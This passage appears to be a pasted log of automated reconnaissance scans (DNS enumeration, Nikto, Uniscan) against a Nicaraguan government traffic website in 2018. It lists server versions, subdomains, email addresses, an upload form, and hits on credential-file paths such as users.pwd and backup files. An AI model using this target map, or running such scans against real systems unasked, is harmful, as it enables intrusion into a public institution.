2399. JQuery[1.11.1
2400. 1.7.1]
2401. Modernizr
2402. PHP[5.2.17]
2403. Script[text/javascript]
2404. Title[Dirección de Seguridad de Transito]
2405. UncommonHeaders[wp-super-cache
2406. x-acc-exp
2407. x-proxy-cache]
2408. WordPress
2409. WordpressSuperCache
2410. X-Powered-By[PHP/5.2.17]
2411. YouTube
2412. nginx[1.14.0]
2413. ######################################################################################################################################
2414. Ip Address Status Type Domain Name Server
2415. ---------- ------ ---- ----------- ------
2416. 50.87.39.91 200 alias ftp.transitonacional.gob.ni nginx/1.14.0
2417. 50.87.39.91 200 host transitonacional.gob.ni nginx/1.14.0
2418. 127.0.0.1 host localhost.transitonacional.gob.ni
2419. 50.87.39.91 200 alias mail.transitonacional.gob.ni nginx/1.14.0
2420. 50.87.39.91 200 host transitonacional.gob.ni nginx/1.14.0
2421. 50.87.39.91 200 host webmail.transitonacional.gob.ni nginx/1.14.0
2422. 50.87.39.91 alias www.transitonacional.gob.ni
2423. 50.87.39.91 host transitonacional.gob.ni
2424. #######################################################################################################################################
2425. [*] Performing General Enumeration of Domain: transitonacional.gob.ni
2426. [-] DNSSEC is not configured for transitonacional.gob.ni
2427. [*] SOA ns1.rhostbh.com 162.159.24.66
2428. [*] NS ns1.rhostbh.com 162.159.24.66
2429. [*] Bind Version for 162.159.24.66 Salt-master
2430. [*] NS ns2.rhostbh.com 162.159.25.91
2431. [*] Bind Version for 162.159.25.91 Salt-master
2432. [*] MX transitonacional.gob.ni 50.87.39.91
2433. [*] A transitonacional.gob.ni 50.87.39.91
2434. [*] TXT transitonacional.gob.ni v=spf1 a mx ptr include:rhostbh.com ?all
2435. [*] Enumerating SRV Records
2436. [-] No SRV Records Found for transitonacional.gob.ni
2437. [+] 0 Records Found
2438. #######################################################################################################################################
2439. [*] Processing domain transitonacional.gob.ni
2440. [+] Getting nameservers
2441. 162.159.24.66 - ns1.rhostbh.com
2442. 162.159.25.91 - ns2.rhostbh.com
2443. [-] Zone transfer failed
2444.  
2445. [+] TXT records found
2446. "v=spf1 a mx ptr include:rhostbh.com ?all"
2447.  
2448. [+] MX records found, added to target list
2449. 0 transitonacional.gob.ni.
2450.  
2451. [*] Scanning transitonacional.gob.ni for A records
2452. 50.87.39.91 - transitonacional.gob.ni
2453. 50.87.39.91 - autoconfig.transitonacional.gob.ni
2454. 50.87.39.91 - autodiscover.transitonacional.gob.ni
2455. 50.87.39.91 - cpanel.transitonacional.gob.ni
2456. 50.87.39.91 - ftp.transitonacional.gob.ni
2457. 127.0.0.1 - localhost.transitonacional.gob.ni
2458. 50.87.39.91 - mail.transitonacional.gob.ni
2459. 50.87.39.91 - webdisk.transitonacional.gob.ni
2460. 50.87.39.91 - webmail.transitonacional.gob.ni
2461. 50.87.39.91 - whm.transitonacional.gob.ni
2462. 50.87.39.91 - www.transitonacional.gob.ni
2463. #######################################################################################################################################
2464. Target :~# transitonacional.gob.ni
2465. dnsmap 0.30 - DNS Network Mapper by pagvac (gnucitizen.org)
2466.  
2467. [+] searching (sub)domains for transitonacional.gob.ni using built-in wordlist
2468. [+] using maximum random delay of 10 millisecond(s) between requests
2469.  
2470. cpanel.transitonacional.gob.ni
2471. IP address #1: 50.87.39.91
2472.  
2473. ftp.transitonacional.gob.ni
2474. IP address #1: 50.87.39.91
2475.  
2476. localhost.transitonacional.gob.ni
2477. IP address #1: 127.0.0.1
2478. [+] warning: domain might be vulnerable to "same site" scripting (http://snipurl.com/etbcv)
2479.  
2480. mail.transitonacional.gob.ni
2481. IP address #1: 50.87.39.91
2482.  
2483. webmail.transitonacional.gob.ni
2484. IP address #1: 50.87.39.91
2485.  
2486. www.transitonacional.gob.ni
2487. IP address #1: 50.87.39.91
2488.  
2489. [+] 6 (sub)domains and 6 IP address(es) found
2490. [+] completion time: 2017 second(s)
2491. 【!】 Main Menu【!】
2492. #######################################################################################################################################
2493. --------------------------------------------------------------------------------------------------------------------------------------
2494. + Target IP: 50.87.39.91
2495. + Target Hostname: www.transitonacional.gob.ni
2496. + Target Port: 80
2497. + Start Time: 2018-08-08 10:06:33 (GMT-4)
2498. --------------------------------------------------------------------------------------------------------------------------------------
2499. + Server: nginx/1.14.0
2500. + Retrieved x-powered-by header: PHP/5.2.17
2501. + The anti-clickjacking X-Frame-Options header is not present.
2502. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
2503. + Uncommon header 'x-acc-exp' found, with contents: 3
2504. + Uncommon header 'x-proxy-cache' found, with contents: HIT www.transitonacional.gob.ni
2505. + Uncommon header 'wp-super-cache' found, with contents: Served supercache file from PHP
2506. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
2507. + Uncommon header 'link' found, with contents: <http://www.transitonacional.gob.ni/wp-json/>; rel="https://api.w.org/"
2508. + Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
2509. + Entry '/wp-admin/admin-ajax.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
2510. + "robots.txt" contains 2 entries which should be manually viewed.
2511. + ERROR: Error limit (20) reached for host, giving up. Last error:
2512. + Scan terminated: 4 error(s) and 11 item(s) reported on remote host
2513. + End Time: 2018-08-08 10:27:45 (GMT-4) (1272 seconds)
2514. ---------------------------------------------------------------------------------------------------------------------------------------
2515. #######################################################################################################################################
2516. =======================================================================================================================================
2517. | [*] http://transitonacional.gob.ni/ redirected to http://www.transitonacional.gob.ni/
2518. | [*] New target is: http://www.transitonacional.gob.ni/
2519. =======================================================================================================================================
2520. | Domain: http://www.transitonacional.gob.ni/
2521. | Server: nginx/1.14.0
2522. | IP: 50.87.39.91
2523. =======================================================================================================================================
2524. |
2525. | Directory check:
2526. | Skipped because http://www.transitonacional.gob.ni/uniscan566/ did not return the code 404
2527. =======================================================================================================================================
2528. |
2529. | File check:
2530. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/favicon.ico
2531. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/index.php
2532. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/license.txt
2533. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/mailman/listinfo
2534. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/.plan
2535. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/readme.html
2536. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/robots.txt
2537. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search/htx/sqlqhit.asp
2538. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search/htx/SQLQHit.asp
2539. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search/SQLQHit.asp
2540. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/search/sqlqhit.asp
2541. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/_vti_pvt/service.pwd
2542. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/_vti_pvt/services.org
2543. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/_vti_pvt/users.pwd
2544. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/_vti_pvt/svacl.cnf
2545. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/w3perl/admin
2546. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wbboard/reply.php
2547. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wconnect/admin.html
2548. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/_vti_pvt/writeto.cnf
2549. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wa.exe
2550. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wbboard/profile.php
2551. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webaccess/access-options.txt
2552. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/WebAdmin.dll?View=Logon
2553. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webaccess.htm
2554. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webadmin.asp
2555. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webadmin.html
2556. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webadmin.nsf
2557. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webadmin.php
2558. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/WEBAGENT/CQMGSERV/CF-SINFO.TPF
2559. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/WebCacheDemo.html
2560. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webcache/webcache.xml
2561. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webamil/test.php?mode=phpinfo
2562. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/web_app/WEB-INF/webapp.properties
2563. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webcalendar/login.php
2564. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webcalendar/view_m.php
2565. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webamil/test.php
2566. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webcart/orders/import.txt
2567. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webcart/config/clients.txt
2568. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/web.config
2569. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webcart-lite/orders/import.txt
2570. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webdynpro/welcome/Welcome.jsp
2571. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webcart-lite/config/import.txt
2572. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/webdav/index.html
2573. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/WEB-INF/web.xml
2574. ======================================================================================================================================
2575. |
2576. | Check robots.txt:
2577. | [+] User-agent: *
2578. | [+] Disallow: /wp-admin/
2579. | [+] Allow: /wp-admin/admin-ajax.php
2580. |
2581. | Check sitemap.xml:
2582. =======================================================================================================================================
2583. #######################################################################################################################################
2584. | External hosts:
2585. | [+] External Host Found: http://flexslider.woothemes.com
2586. | [+] External Host Found: http://html5shim.googlecode.com
2587. | [+] External Host Found: http://php.net
2588. | [+] External Host Found: http://www.koidiseno.com
2589. | [+] External Host Found: http://code.jquery.com
2590. | [+] External Host Found: http://ajax.googleapis.com
2591. | [+] External Host Found: http://www.mysql.com
2592. | [+] External Host Found: https://wordpress.org
2593. | [+] External Host Found: https://codex.wordpress.org
2594. | [+] External Host Found: https://planet.wordpress.org
2595. | [+] External Host Found: http://httpd.apache.org
2596. |
2597. | PHPinfo() Disclosure:
2598. |
2599. | Web Backdoors:
2600. |
2601. | File Upload Forms:
2602. | [+] Upload Form Found: http://www.transitonacional.gob.ni/denuncias
2603. |
2604. | E-mails:
2605. | [+] E-mail Found: info@transitonacional.gob.ni
2606. | [+] E-mail Found: transitonacional@gmail.com
2607. | [+] E-mail Found: m@tidakada.com
2608. |
2609. | Ignored Files:
2610. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-bn_IN.mo
2611. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ml_IN.mo
2612. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-uk.mo
2613. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-gu_IN.mo
2614. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-bg_BG.mo
2615. | http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/readme.md
2616. | http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free/pie.js?ver=4.4.2
2617. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ta.mo
2618. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ca.mo
2619. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-sq.mo
2620. | http://www.transitonacional.gob.ni/wp-content/themes/newsmag/js/modernizr.min.js?ver=4.4.2
2621. | http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js?ver=1.8.16
2622. | http://www.transitonacional.gob.ni/wp-content/themes/newsmag/css/prettyPhoto.css?ver=4.4.2
2623. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-si_LK.mo
2624. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-bs_BA.mo
2625. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20
2626. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.2.2
2627. | http://www.transitonacional.gob.ni/wp-content/themes/newsmag/js/jquery.flexslider-min.js?ver=4.4.2
2628. | http://www.transitonacional.gob.ni/wp-admin/css/login.min.css?ver=4.4.2
2629. | http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/js/slideshow.js?ver=4.4.2
2630. | http://www.transitonacional.gob.ni/wp-includes/css/buttons.min.css?ver=4.4.2
2631. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-pt_PT.mo
2632. | http://www.transitonacional.gob.ni/wp-admin/css/install.css?ver=20100228
2633. | http://www.transitonacional.gob.ni/wp-content/themes/newsmag/css/flexslider.css?ver=4.4.2
2634. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-cs_CZ.mo
2635. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ga_IE.mo
2636. | http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free/exporting/canvg.js?ver=4.4.2
2637. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-lv.mo
2638. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-es_ES.mo
2639. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.2.2
2640. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-be_BY.mo
2641. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-bn_BD.mo
2642. | http://www.transitonacional.gob.ni/wp-content/plugins/transito_mapa/transitomapa.js?ver=4.4.2
2643. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-pl_PL.mo
2644. | http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free/exporting/amexport.js?ver=4.4.2
2645. | http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free/serial.js?ver=4.4.2
2646. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-tl.mo
2647. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-sk_SK.mo
2648. | http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/js/jquery.cycle.all.js?ver=4.4.2
2649. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-mt_MT.mo
2650. | http://www.transitonacional.gob.ni/wp-admin/css/ie.min.css?ver=4.4.2
2651. | http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free/exporting/rgbcolor.js?ver=4.4.2
2652. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-sv_SE.mo
2653. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-el.mo
2654. | http://www.transitonacional.gob.ni/wp-includes/wlwmanifest.xml
2655. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-vi.mo
2656. | http://www.transitonacional.gob.ni/wp-includes/js/wp-embed.min.js?ver=4.4.2
2657. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-th.mo
2658. | http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/js/transito_grafico.js?ver=4.4.2
2659. | http://www.transitonacional.gob.ni/wp-admin/css/install.min.css?ver=4.4.2
2660. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-hy_AM.mo
2661. | http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free/exporting/filesaver.js?ver=4.4.2
2662. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-pa_IN.mo
2663. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-pt_BR.mo
2664. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-mk_MK.mo
2665. | http://www.transitonacional.gob.ni/wp-includes/css/dashicons.min.css?ver=4.4.2
2666. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-id_ID.mo
2667. | http://www.transitonacional.gob.ni/wp-includes/js/jquery/jquery.js?ver=1.11.3
2668. | http://www.transitonacional.gob.ni/wp-includes/js/comment-reply.min.js?ver=4.4.2
2669. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-nl_NL.mo
2670. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ro_RO.mo
2671. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-gl_ES.mo
2672. | http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/README.md
2673. | http://www.transitonacional.gob.ni/wp-content/plugins/tabby-responsive-tabs/js/tabby.js?ver=1.2.2
2674. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-et.mo
2675. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-hr.mo
2676. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-de_DE.mo
2677. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-af.mo
2678. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-az.mo
2679. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ru_RU.mo
2680. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-zh_CN.mo
2681. | http://www.transitonacional.gob.ni/wp-content/plugins/tabby-responsive-tabs/css/tabby.css?ver=1.2.2
2682. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ckb.mo
2683. | http://www.transitonacional.gob.ni/wp-content/themes/newsmag/js/jquery.prettyPhoto.js?ver=4.4.2
2684. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-sr_RS.mo
2685. | http://www.transitonacional.gob.ni/wp-content/themes/newsmag/js/customscript.js?ver=4.4.2
2686. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-sl_SI.mo
2687. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-he_IL.mo
2688. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-da_DK.mo
2689. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ht.mo
2690. | http://www.transitonacional.gob.ni/wp-content/plugins/tabby-responsive-tabs/css/tabby-print.css?ver=1.2.2
2691. | http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/js/jquery.touchwipe.1.1.1.js?ver=4.4.2
2692. | http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js?ver=1.7.1
2693. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-zh_TW.mo
2694. | http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/css/meteor-slides.css?ver=1.0
2695. | http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/css/bootstrap-accordion.min.css?ver=4.4.2
2696. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ko_KR.mo
2697. | http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free/amcharts.js?ver=4.4.2
2698. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-eu.mo
2699. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-tr_TR.mo
2700. | http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/js/bootstrap-accordion.min.js?ver=1.0
2701. | http://www.transitonacional.gob.ni/wp-content/plugins/itro-popup/scripts/itro-scripts.js?ver=4.4.2
2702. | http://www.transitonacional.gob.ni/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
2703. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-nb_NO.mo
2704. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ja.mo
2705. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-fa_IR.mo
2706. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-it_IT.mo
2707. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-fr_FR.mo
2708. | http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/js/jquery.metadata.v2.js?ver=4.4.2
2709. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ar.mo
2710. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-eo_EO.mo
2711. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ka_GE.mo
2712. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-fi.mo
2713. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-lt_LT.mo
2714. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-hi_IN.mo
2715. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-ms_MY.mo
2716. | http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/languages/contact-form-7-hu_HU.mo
2717. ======================================================================================================================================
2718. #######################################################################################################################################
2719. | Backup Files:
2720. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin~
2721. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/update-core.php~
2722. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content~
2723. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/import.php~
2724. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/import.php.bkp
2725. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/css.bkp
2726. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/css~
2727. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/install.php.bkp
2728. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/upgrade.php~
2729. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/install.php~
2730. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/images.bkp
2731. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/update-core.php.bkp
2732. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content.bkp
2733. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/upgrade.php.bkp
2734. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-admin/images~
2735. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/themes.bkp
2736. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/license.txt.bkp
2737. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-login.php.bkp
2738. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-login.php~
2739. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/themes~
2740. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/themes/newsmag.bkp
2741. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/license.txt~
2742. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/feed~
2743. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/css~
2744. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/feed.bkp
2745. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/themes/newsmag~
2746. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/xmlrpc.php.bkp
2747. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/xmlrpc.php~
2748. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/css.bkp
2749. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/comments/feed.bkp
2750. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/comments/feed~
2751. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jquery.bkp
2752. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion.bkp
2753. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/includes/css.bkp
2754. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/comments~
2755. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins.bkp
2756. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/comments.bkp
2757. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/includes/css~
2758. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins~
2759. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jquery~
2760. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion~
2761. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jquery/1.8.3~
2762. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/includes~
2763. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax.bkp
2764. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/includes.bkp
2765. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jquery/1.8.3.bkp
2766. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs~
2767. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs.bkp
2768. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jqueryui/1.9.2.bkp
2769. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7.bkp
2770. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/css~
2771. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jqueryui/1.9.2~
2772. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/css.bkp
2773. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7~
2774. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free/exporting.bkp
2775. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides.bkp
2776. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides~
2777. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free.bkp
2778. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free/exporting~
2779. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax~
2780. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/amcharts_3.4.10.free~
2781. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/css.bkp
2782. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico~
2783. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/js.bkp
2784. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com~
2785. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com/ajax/libs/jqueryui~
2786. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/css~
2787. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/js.bkp
2788. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni//ajax.googleapis.com.bkp
2789. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico.bkp
2790. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/js~
2791. | [+] CODE: 200 URL: http://www.transitonacional.gob.ni/wp-content/plugins/itro-popup~
